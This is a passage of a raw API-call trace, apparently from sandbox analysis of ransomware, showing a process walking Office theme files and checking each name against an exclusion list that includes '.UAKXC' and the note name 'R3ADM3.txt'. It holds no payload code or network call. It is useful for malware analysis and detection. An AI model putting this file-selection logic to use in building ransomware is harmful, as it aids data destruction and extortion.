0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch=".msi") returned 0x0 [0158.293] StrStrIW (lpFirst="Hardcover.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213f8 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf213f8 | out: hHeap=0xea0000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf213f8 [0158.294] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34298 [0158.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.294] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.294] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ad15600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7ad15600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x3becb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Horizon.thmx", cAlternateFileName="HORIZO~1.THM")) returned 1 [0158.294] lstrcmpW (lpString1="Horizon.thmx", lpString2=".") returned 1 [0158.294] lstrcmpW (lpString1="Horizon.thmx", lpString2="..") returned 1 [0158.294] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".UAKXC") returned 0x0 [0158.294] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".exe") returned 0x0 [0158.294] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".dll") returned 0x0 [0158.295] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".lnk") returned 0x0 [0158.295] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".sys") returned 0x0 [0158.295] StrStrIW (lpFirst="Horizon.thmx", lpSrch=".msi") returned 0x0 [0158.295] StrStrIW (lpFirst="Horizon.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21420 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21420 | out: hHeap=0xea0000) returned 1 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21420 [0158.295] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34330 [0158.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.295] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.295] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x157d6500, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b584a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x157d6500, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x146a7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Median.thmx", cAlternateFileName="MEDIAN~1.THM")) returned 1 [0158.295] lstrcmpW (lpString1="Median.thmx", lpString2=".") returned 1 [0158.295] lstrcmpW (lpString1="Median.thmx", lpString2="..") returned 1 [0158.295] StrStrIW (lpFirst="Median.thmx", lpSrch=".UAKXC") returned 0x0 [0158.295] StrStrIW (lpFirst="Median.thmx", lpSrch=".exe") returned 0x0 [0158.295] StrStrIW (lpFirst="Median.thmx", lpSrch=".dll") returned 0x0 [0158.295] StrStrIW (lpFirst="Median.thmx", lpSrch=".lnk") returned 0x0 [0158.295] StrStrIW (lpFirst="Median.thmx", lpSrch=".sys") returned 0x0 [0158.296] StrStrIW (lpFirst="Median.thmx", lpSrch=".msi") returned 0x0 [0158.296] StrStrIW (lpFirst="Median.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21448 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.296] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.296] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.296] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21448 | out: hHeap=0xea0000) returned 1 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21448 [0158.296] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf343c8 [0158.296] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.296] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.296] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1910ec00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1910ec00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x13af1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Metro.thmx", cAlternateFileName="METRO~1.THM")) returned 1 [0158.296] lstrcmpW (lpString1="Metro.thmx", lpString2=".") returned 1 [0158.296] lstrcmpW (lpString1="Metro.thmx", lpString2="..") returned 1 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".UAKXC") returned 0x0 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".exe") returned 0x0 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".dll") returned 0x0 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".lnk") returned 0x0 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".sys") returned 0x0 [0158.296] StrStrIW (lpFirst="Metro.thmx", lpSrch=".msi") returned 0x0 [0158.297] StrStrIW (lpFirst="Metro.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21470 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf21470 | out: hHeap=0xea0000) returned 1 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xf21470 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd190 [0158.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.297] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.297] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b734600, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1b734600, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1583a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Module.thmx", cAlternateFileName="MODULE~1.THM")) returned 1 [0158.297] lstrcmpW (lpString1="Module.thmx", lpString2=".") returned 1 [0158.297] lstrcmpW (lpString1="Module.thmx", lpString2="..") returned 1 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".UAKXC") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".exe") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".dll") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".lnk") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".sys") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch=".msi") returned 0x0 [0158.297] StrStrIW (lpFirst="Module.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.297] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32f8 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.298] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.298] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.298] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef32f8 | out: hHeap=0xea0000) returned 1 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32f8 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34460 [0158.298] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.298] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.298] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e64dd00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ba4760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7e64dd00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x96ac7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Newsprint.thmx", cAlternateFileName="NEWSPR~1.THM")) returned 1 [0158.298] lstrcmpW (lpString1="Newsprint.thmx", lpString2=".") returned 1 [0158.298] lstrcmpW (lpString1="Newsprint.thmx", lpString2="..") returned 1 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".UAKXC") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".exe") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".dll") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".lnk") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".sys") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch=".msi") returned 0x0 [0158.298] StrStrIW (lpFirst="Newsprint.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32d0 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.298] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef32d0 | out: hHeap=0xea0000) returned 1 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef32d0 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf344f8 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.299] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f06cd00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ba4760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1f06cd00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x132b9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Opulent.thmx", cAlternateFileName="OPULEN~1.THM")) returned 1 [0158.299] lstrcmpW (lpString1="Opulent.thmx", lpString2=".") returned 1 [0158.299] lstrcmpW (lpString1="Opulent.thmx", lpString2="..") returned 1 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".UAKXC") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".exe") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".dll") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".lnk") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".sys") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch=".msi") returned 0x0 [0158.299] StrStrIW (lpFirst="Opulent.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3258 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.299] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.299] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3258 | out: hHeap=0xea0000) returned 1 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef3258 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34590 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.300] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x229a5400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x229a5400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x16ef4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oriel.thmx", cAlternateFileName="ORIEL~1.THM")) returned 1 [0158.300] lstrcmpW (lpString1="Oriel.thmx", lpString2=".") returned 1 [0158.300] lstrcmpW (lpString1="Oriel.thmx", lpString2="..") returned 1 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".UAKXC") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".exe") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".dll") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".lnk") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".sys") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch=".msi") returned 0x0 [0158.300] StrStrIW (lpFirst="Oriel.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.300] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.300] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeacb8 | out: hHeap=0xea0000) returned 1 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeacb8 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd218 [0158.301] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.301] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.301] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262ddb00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x262ddb00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1540b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Origin.thmx", cAlternateFileName="ORIGIN~1.THM")) returned 1 [0158.301] lstrcmpW (lpString1="Origin.thmx", lpString2=".") returned 1 [0158.301] lstrcmpW (lpString1="Origin.thmx", lpString2="..") returned 1 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".UAKXC") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".exe") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".dll") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".lnk") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".sys") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch=".msi") returned 0x0 [0158.301] StrStrIW (lpFirst="Origin.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.301] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.301] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.301] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeac90 | out: hHeap=0xea0000) returned 1 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0158.301] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xeeac90 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34628 [0158.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0158.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.302] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c16200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c16b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x29c16200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x421e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Paper.thmx", cAlternateFileName="PAPER~1.THM")) returned 1 [0158.302] lstrcmpW (lpString1="Paper.thmx", lpString2=".") returned 1 [0158.302] lstrcmpW (lpString1="Paper.thmx", lpString2="..") returned 1 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".UAKXC") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".exe") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".dll") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".lnk") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".sys") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch=".msi") returned 0x0 [0158.302] StrStrIW (lpFirst="Paper.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.302] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0158.302] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd2a0 [0158.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed8e80 | out: hHeap=0xea0000) returned 1 [0158.303] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51182f00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c16b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51182f00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xd15a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Perspective.thmx", cAlternateFileName="PERSPE~1.THM")) returned 1 [0158.303] lstrcmpW (lpString1="Perspective.thmx", lpString2=".") returned 1 [0158.303] lstrcmpW (lpString1="Perspective.thmx", lpString2="..") returned 1 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".UAKXC") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".exe") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".dll") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".lnk") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".sys") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch=".msi") returned 0x0 [0158.303] StrStrIW (lpFirst="Perspective.thmx", lpSrch="R3ADM3.txt") returned 0x0 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32908 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf329f8 [0158.303] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa6) returned 0xed8e80 [0158.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf329f8 | out: hHeap=0xea0000) returned 1 [0158.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32908 | out: hHeap=0xea0000) returned 1 [0158.303] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0158.303] RtlAllocateHeap 